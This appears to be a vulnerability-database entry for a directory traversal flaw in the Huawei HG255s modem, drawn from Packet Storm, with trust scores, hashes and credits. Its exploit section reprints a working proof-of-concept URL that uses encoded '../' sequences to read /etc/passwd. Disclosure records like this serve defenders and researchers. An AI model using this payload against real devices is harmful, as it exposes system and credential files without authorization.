Sign-up

ID

VAR-E-201709-0153


TITLE

Huawei HG255s Directory Traversal

Trust: 0.5

sources: PACKETSTORM: 144060

DESCRIPTION

Huawei HG255s suffers from a directory traversal vulnerability.

Trust: 0.5

sources: PACKETSTORM: 144060

AFFECTED PRODUCTS

vendor:huaweimodel:hg255sscope: - version: -

Trust: 0.5

sources: PACKETSTORM: 144060

EXPLOIT

# Exploit Title: [Server Directory Traversal at Huawei HG255s]

# Date: [07.09.2017]

# Exploit Author: [Ahmet Mersin]

# Vendor Homepage: [www.huawei.com]

# Software Link: [Not published this modem just used by Turkey]

# Version: [V100R001C163B025SP02]

#POC:

https://www.youtube.com/watch?v=n02toTFkLOU&feature=youtu.be

http://192.168.1.1/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd

#You want to follow my activity ?

https://www.linkedin.com/in/ahmet-mersin-177398b0/

@gaissecurity

Trust: 0.5

sources: PACKETSTORM: 144060

EXPLOIT HASH

LOCAL

SOURCE

md5: adeb025562e7f5dd4093670510800427
sha-1: c8f2ce26ca7c17ecaf8cae9a8ac93fff94abddd7
sha-256: b421c24591f0f6e7b124c83bcbcfd081112d9efb502c7cb471dfa8ceca3daf75
md5: adeb025562e7f5dd4093670510800427

Trust: 0.5

sources: PACKETSTORM: 144060

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 144060

TYPE

file inclusion

Trust: 0.5

sources: PACKETSTORM: 144060

TAGS

tag:exploit

Trust: 0.5

tag:file inclusion

Trust: 0.5

sources: PACKETSTORM: 144060

CREDITS

Ahmet Mersin

Trust: 0.5

sources: PACKETSTORM: 144060

EXTERNAL IDS

db:PACKETSTORMid:144060

Trust: 0.5

sources: PACKETSTORM: 144060

SOURCES

db:PACKETSTORMid:144060

LAST UPDATE DATE

2022-07-27T09:21:26.888000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:144060date:2017-09-08T11:01:11